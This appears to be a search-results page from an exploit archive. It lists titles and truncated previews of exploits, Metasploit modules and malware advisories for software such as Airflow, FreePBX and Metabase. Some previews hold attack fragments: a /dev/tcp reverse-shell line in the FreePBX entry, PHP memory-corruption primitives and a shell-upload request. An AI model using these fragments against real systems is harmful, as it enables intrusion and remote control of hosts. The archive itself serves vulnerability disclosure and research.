50738 matches found
Apache Airflow 1.10.10 Remote Code Execution
Exploit Title: Apache Airflow 1.10.10 - 'Example Dag' Remote Code Execution Date: 2021-06-02 Exploit Author: Pepe Berba Vendor Homepage: https://airflow.apache.org/ Software Link: https://airflow.apache.org/docs/apache-airflow/stable/installation.html Version: = 1.10.10 Tested on: Docker...
Backdoor.Win32.NetSpy.10 Heap Corruption
Discovery / credits: Malvuln - malvuln.com c 2021 Original source: https://malvuln.com/advisory/e677149c35cbba118655d9b133da8827.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Backdoor.Win32.NetSpy.10 Vulnerability: Heap Corruption Description: The malware listens on TCP port...
Basic Shopping Cart 1.0 SQL Injection
Exploit Title: Basic Shopping Cart 1.0 - Authentication Bypass Date: 2021-04-03 Exploit Author: Viren Saroha illusion Vendor Homepage: https://www.sourcecodester.com/php/10964/basic-shopping-cartphpmysql.html Software Link:...
Simple Food Website 1.0 SQL Injection
Exploit Title: Simple Food Website CMS | Admin Bypass SQLi Exploit Author: Richard Jones Date: 02-04-2021 Vendor Homepage: https://www.sourcecodester.com/ Software Link: https://www.sourcecodester.com/php/12510/simple-food-website-php.html Version: 1.0 Tested On: Windows 10 Home 19041 x6486 + XAM...
Trojan-Dropper.Win32.Delf.p Missing Authentication
Discovery / credits: Malvuln - malvuln.com c 2021 Original source: https://malvuln.com/advisory/b02cc578d2e7f24fb67ec0afc42a9e13.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Trojan-Dropper.Win32.Delf.p Vulnerability: Missing Authentication Description: Delf.p drops an...
Backdoor.Win32.Zombam.a Remote Stack Buffer Overflow
Discovery / credits: malvuln - Malvuln.com c 2021 Original source: https://malvuln.com/advisory/6c5081e9b65a52963b0b1ae612ef7eb4.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Backdoor.Win32.Zombam.a Vulnerability: Remote Stack Buffer Overflow Description: The malware listens...
PHP 7.3 disable_functions Bypass
= 0; $j-- $address = 8; return $out; function write&$str, $p, $v, $n = 8 $i = 0; for$i = 0; $i = 8; function leak$addr, $p = 0, $s = 8 global $abc, $helper; write$abc, 0x68, $addr + $p - 0x10; $leak = strlen$helper-a; if$s != 8 $leak %= 2 $s 8 - 1; return $leak; function parseelf$base $etype =...
Tibco JasperSoft Path Traversal
Title: CVE-2018-18809 Path traversal in Tibco JasperSoft Credit: Elar Lang / https://security.elarlang.eu Vendor/Product: Tibco JasperSoft https://www.jaspersoft.com/ Vulnerability: Path traversal CVE: CVE-2018-18809 Path traversal Vulnerability is in reportresource/reportresource/ service and in...
Malicious Git HTTP Server
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Malicious Git HTTP Server For CVE-2018-17456', 'Description' = %q This module exploits CVE-2018-17456, which affects Git versions 2.14.5, 2.15.3,...
Microsoft Internet Information Services Cross Site Scripting
Cross Site Scripting / HTML injection vulnerability in Microsoft Internet Information Services web server ================================== Versions Affected: MS Internet Information services All platforms and versions ================================== CVE Reference: CVE-2017-0055...
C-MOR Video Surveillance 5.2401 / 6.00PL01 Command Injection
Advisory ID: SYSS-2024-030 Product: C-MOR Video Surveillance Manufacturer: za-internet GmbH Affected Versions: 5.2401, 6.00PL01 Tested Versions: 5.2401, 6.00PL01 Vulnerability Type: OS Command Injection CWE-78 Risk Level: High Solution Status: Open Manufacturer Notification: 2024-04-05 Solution...
Online Travel Agency System 1.0 Arbitrary File Upload
============================================================================================================================================= | Title : Online Travel Agency System v1.0 Remote File Upload Vulnerability | | Author : indoushka | | Tested on : windows 10 FrPro / browser : Mozilla...
Joomla SP Page Builder 5.2.7 SQL Injection
==================================================================================================================================== | Title : SP Page Builder 5.2.7 Sql injection Vulnerability | | Author : indoushka | | Tested on : windows 10 FranƧais V.Pro / browser : Mozilla firefox 69.032-bit ...
Viessmann Vitogate 300 2.1.3.0 Remote Code Execution
Exploit Title: Viessmann Vitogate 300 = 2.1.3.0 - Remote Code Execution RCE - Shodan Dork: http.title:'Vitogate 300' - Exploit Author: ByteHunter - Email: [email protected] - Version: versions up to 2.1.3.0 - Tested on: 2.1.1.0 - CVE : CVE-2023-5702 & CVE-2023-5222 import argparse import...
Metabase 0.46.6 Remote Code Execution
Exploit Title: metabase 0.46.6 - Pre-Auth Remote Code Execution Google Dork: N/A Date: 13-10-2023 Exploit Author: Musyoka Ian Vendor Homepage: https://www.metabase.com/ Software Link: https://www.metabase.com/ Version: metabase 0.46.6 Tested on: Ubuntu 22.04, metabase 0.46.6 CVE : CVE-2023-38646...
WordPress Phlox-Pro Theme 5.14.0 Cross Site Scripting
Exploit Title: WordPress Theme phlox-pro 5.14.0 - 'searchform' Cross-Site Scripting XSS Date: 3/12/2023 Exploit Author: Haktrak Team Vendor Homepage: https://phlox.pro Software Link: https://www.phlox.pro/go/ Version: 5.14.0 Tested on: Linuxapache/wordrepss 6.3.1 Description: A Cross Site Scripti...
Aplikasi Sistem Informasi Kelulusan CMS 1.0.9 Local File Inclusion
==================================================================================================================================== | Title : Aplikasi Sistem Informasi Kelulusan CMS v 1.0.9 ASIK LFI Vulnerability | | Author : indoushka | | Tested on : windows 10 FranƧais V.Pro / browser : Mozill...
GZ Appointment Scheduling 1.8 Cross Site Scripting
āāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāā āā C r a C k E r āā āā T H E C R A C K O F E T E R N A L M I G H T āā āāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāā āāāāā From The Ashes and Dust Rises An...
Sales Tracker Management System 1.0 HTML Injection
Exploit Title: Sales Tracker Management System v1.0 ā Multiple Vulnerabilities Google Dork: NA Date: 09-06-2023 EXPLOIT-AUTHOR: AFFAN AHMED Vendor Homepage: Software Link: Version: 1.0 Tested on: Windows 11 + XAMPP CVE : CVE-2023-3184 ============================== CREDENTIAL TO USE...
Millhouse-Project 1.414 Shell Upload
sdsdsds ------WebKitFormBoundaryzlHN0BEvvaJsDgh8 Content-Disposition: form-data; name="files"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundaryzlHN0BEvvaJsDgh8 Content-Disposition: form-data; name="category" 1 ------WebKitFormBoundaryzlHN0BEvvaJsDgh8 Content-Disposition...
FUXA 1.1.13-1186 Remote Code Execution
Exploit Title: FUXA V.1.1.13-1186- Unauthenticated Remote Code Execution RCE Date: 18/04/2023 Exploit Author: Rodolfo Mariano Vendor Homepage: https://github.com/frangoteam/FUXA Version: FUXA V.1.1.13-1186 current from argparse import RawTextHelpFormatter import argparse, sys, threading, requests...
WordPress Real Estate 7 Theme 3.3.4 Cross Site Scripting
==== Z://USB-00RESEARCH/WORDPRESS/ ============================================= 2023 == Report Title: WordPress Real Estate 7 Theme = 3.3.4 - Unauthenticated Reflected Cross-Site Scripting XSS Google Dork: inurl:/wp-content/themes/realestate-7/ Research Date: 2023-02-10 Researcher: FearZzZz...
Buffalo TeraStation Network Attached Storage (NAS) 1.66 Authentication Bypass
Exploit Title: Buffalo TeraStation Network Attached Storage NAS 1.66 - Authentication Bypass Date: 2022-08-11 Exploit Author: JORDAN GLOVER Type: WEBAPPS Platform: HARDWARE Vendor Homepage: https://www.buffalotech.com/ Model: TeraStation Series Firmware Version: 1.66 Tested on: Windows 10 An...
Transposh WordPress Translation 1.0.8.1 Information Disclosure
RCE Security Advisory https://www.rcesecurity.com 1. ADVISORY INFORMATION ======================= Product: Transposh WordPress Translation Vendor URL: https://wordpress.org/plugins/transposh-translation-filter-for-wordpress/ Type: Exposure of Sensitive Information to an Unauthorized Actor CWE-200...
WordPress W-DALIL 2.0 Cross Site Scripting
Exploit Title: WordPress Plugin W-DALIL - Stored Cross Site Scripting Date: 27-06-2022 Exploit Author: Mariam Tariq - HunterSherlock Vendor Homepage: https://wordpress.org/plugins/w-dalil/ Version: 2.0 Tested on: Firefox Contact me: [email protected] Vulnerable Code: " value="" / Steps To...
Backdoor.Win32.SVC Buffer Overflow
Discovery / credits: Malvuln - malvuln.com c 2021 Original source: https://malvuln.com/advisory/011961a42700e7385a106d362eb661c7.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Backdoor.Win32.SVC Vulnerability: Remote Stack Buffer Overflow Description: The malware listens on T...
Terramaster F4-210 / F2-210 Remote Code Execution
/bin/env python """ Product: Terramaster F4-210, Terramaster F2-210 Version: TOS 4.2.X 4.2.15-2107141517 Author: n0tme thatsn0tmysite Description: Chain from unauthenticated to root via session crafting. """ import urllib3 import requests import json import argparse import hashlib import time...
LimeSurvey 5.2.4 Remote Code Execution
Exploit Title: LimeSurvey 5.2.4 - Remote Code Execution RCE Authenticated Google Dork: inurl:limesurvey/index.php/admin/authentication/sa/login Date: 05/12/2021 Exploit Author: Y1LD1R1M Vendor Homepage: https://www.limesurvey.org/ Software Link:...
Backdoor.Win32.Agent.ad Insecure Credential Storage
Discovery / credits: Malvuln - malvuln.com c 2021 Original source: https://malvuln.com/advisory/d2b933ebadd5c808ca4c68ae173e2d62.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Backdoor.Win32.Agent.ad Vulnerability: Insecure Credential Storage Description: The malware listens ...
WordPress Contact Form To Email 1.3.24 Cross Site Scripting
Exploit Title: WordPress Plugin Contact Form to Email 1.3.24 - Stored Cross Site Scripting XSS Authenticated Date: 11/11/2021 Exploit Author: Mohammed Aadhil Ashfaq Vendor Homepage: https://form2email.dwbooster.com/ Version: 1.3.24 Tested on: wordpress POC 1. Click Contact form to Email...
Virus.Win32.Ipamor.c Unauthenticated Remote System Reboot
Discovery / credits: Malvuln - malvuln.com c 2021 Original source: https://malvuln.com/advisory/bbf032a3aa288f02403295f0472d1f05.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Virus.Win32.Ipamor.c Vulnerability: Unauthenticated Remote System Reboot Description: The malware...
Moodle SpellChecker Path Authenticated Remote Command Execution
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Moodle SpellChecker Path Authenticated Remote Command Execution', 'Description' = %q Moodle allows an authenticated administrator to define...
Cypress Solutions CTM-200/CTM-ONE Hard-Coded Credentials Remote Root
!/usr/bin/env python3 Cypress Solutions CTM-200/CTM-ONE Hard-coded Credentials Remote Root Telnet/SSH Vendor: Cypress Solutions Inc. Product web page: https://www.cypress.bc.ca Affected version: CTM-ONE 1.3.6-latest CTM-ONE 1.3.1 CTM-ONE 1.1.9 CTM200 2.7.1.5659-latest CTM200 2.0.5.3356-184 Summar...
Backdoor.Win32.Bifrose.acci Buffer Overflow
Discovery / credits: Malvuln - malvuln.com c 2021 Original source: https://malvuln.com/advisory/611dbff0d68df777c6d6881e00440143.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Backdoor.Win32.Bifrose.acci Vulnerability: Local Stack Buffer Overflow Description: Bifrost doesn't...
HEUR.Trojan.Win32.Bayrob.gen Insecure Permissions
Discovery / credits: Malvuln - malvuln.com c 2021 Original source: https://malvuln.com/advisory/765698ccfb033c86eea6d293235d7ed0.txt Contact: [email protected] Media: twitter.com/malvuln Threat: HEUR.Trojan.Win32.Bayrob.gen Vulnerability: Insecure Permissions Description: The malware creates a...
Backdoor.Win32.BO2K.ab Buffer Overflow
Discovery / credits: Malvuln - malvuln.com c 2021 Original source: https://malvuln.com/advisory/ca4e5a6ff033b62fa59de5a5dd24c7f9.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Backdoor.Win32.BO2K.ab Vulnerability: Local File Buffer Overflow Description: PsyConf - Program...
IBM Cognos TM1 / IBM Planning Analytics Server Configuration Overwrite / Code Execution
Hi, Here's a fun one I have been working on for some time. tl;dr IBM PA / TM1, dating back to 2014, maybe 2009 is vulnerable to a unauthenticated configuration overwrite; this is abused to "fake authenticate" to it, and finally execute code as root / SYSTEM using TM1 scripting. Advisory below,...
Microsoft Windows AppXsvc Deployment Extension Privilege Escalation
Exploit Title: Microsoft Windows AppXsvc Deployment Extension - Privilege Escalation Date: 2019-11-22 Exploit Author: Abdelhamid Naceri Vendor Homepage: www.microsoft.com Tested on: Windows 10 1903 CVE : CVE-2019-1385 Windows: "AppX Deployment Service" AppXSVC elevation of privilege vulnerability...
Sar2HTML 3.2.1 Remote Command Execution
Exploit Title: sar2html Remote Code Execution Date: 01/08/2019 Exploit Author: Furkan KAYAPINAR Vendor Homepage:https://github.com/cemtan/sar2html Software Link: https://sourceforge.net/projects/sar2html/ Version: 3.2.1 Tested on: Centos 7 In web application you will see index.php?plot url...
Linux Landlock Disable
A logic bug was discovered in Linux that makes it possible for a process to get rid of all Landlock restrictions applied to it. I found a logic bug that makes it possible for a process to get rid of all Landlock restrictions applied to it: When a process' cred struct is replaced, this almost alwa...
ABB Cylon Aspect 3.08.01 logCriticalLookup.php Unauthenticated Log Disclosure
ABB Cylon Aspect 3.08.01 logCriticalLookup.php Unauthenticated Log Disclosure Vendor: ABB Ltd. Product web page: https://www.global.abb Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio Firmware: =3.08.01 Summary: ASPECT is an award-winning scalable building energy...
GeoServer 2.25.1 Code Injection
============================================================================================================================================= | Title : GeoServer 2.25.1 Code Injection Vulnerability | | Author : indoushka | | Tested on : windows 10 FrPro / browser : Mozilla firefox 130.0.2 64 bits...
Simple Music Management System 1.0 Arbitrary File Upload
============================================================================================================================================= | Title : Simple Music Management System v1.0 Remote File Upload Vulnerability | | Author : indoushka | | Tested on : windows 10 FrPro / browser : Mozilla...
Beauty Parlour And Saloon Management System 1.1 Insecure Settings
==================================================================================================================================== | Title : Beauty Parlour & Saloon Management System 1.1 Insecure Settings Vulnerability | | Author : indoushka | | Tested on : windows 10 FrPro / browser : Mozilla...
IBM Data Risk Manager Arbitrary File Download
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'IBM Data Risk Manager Arbitrary File Download', 'Description' = %q IBM Data Risk Manager IDRM contains two vulnerabilities that can be chained by...
FreePBX 16 Remote Code Execution
Exploit Title: FreePBX 16 - Remote Code Execution RCE Authenticated Exploit Author: Cold z3ro Date: 6/1/2024 Tested on: 14,15,16 Vendor: https://www.freepbx.org/ %26 /dev/tcp/'.$backconnectip.'/4444 0%261'; curlsetopt$ch, CURLOPTSSLVERIFYHOST, false; curlsetopt$ch, CURLOPTSSLVERIFYPEER, false; ec...
WhatsUp Gold 2022 22.1.0 Build 39 Cross Site Scripting
Exploit Title: WhatsUpGold 22.1.0 - Stored Cross-Site Scripting XSS Date: April 18, 2023 Exploit Author: Andreas Finstad 4ndr34z Vendor Homepage: https://www.whatsupgold.com Version: v.22.1.0 Build 39 Tested on: Windows 2022 Server CVE : CVE-2023-35759 Reference:...
PHPJabbers Meeting Room Booking System 1.0 Missing Rate Limiting
Exploit Title: PHPJabbers Meeting Room Booking System v1.0 - No Rate Limit Date: 19/12/2023 Exploit Author: BugsBD Limited Discover by: Rahad Chowdhury Vendor Homepage: https://www.phpjabbers.com/ Software Link: https://www.phpjabbers.com/meeting-room-booking-system/sectionDemo Version: v1.0 Test...
Microsoft Defender Anti-Malware PowerShell API Arbitrary Code Execution
Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFTDEFENDERANTIMALWAREPOWERSHELLAPIUNINTENDEDCODEEXECUTION.txt + twitter.com/hyp3rlinx + x.com/hyp3rlinx + ISR: ApparitionSec Vendor www.microsoft.com Product Windows...
Penglead 2.0 SQL Injection
Title: penglead-2.0 SQLi-Bypass Authentication Author: nu11secur1ty Date: 11/10/2023 Vendor: https://www.mayurik.com/ Software: https://www.mayurik.com/source-code/P2760/lead-management-system-in-php-free-download Reference: https://portswigger.net/web-security/sql-injection Description: The id...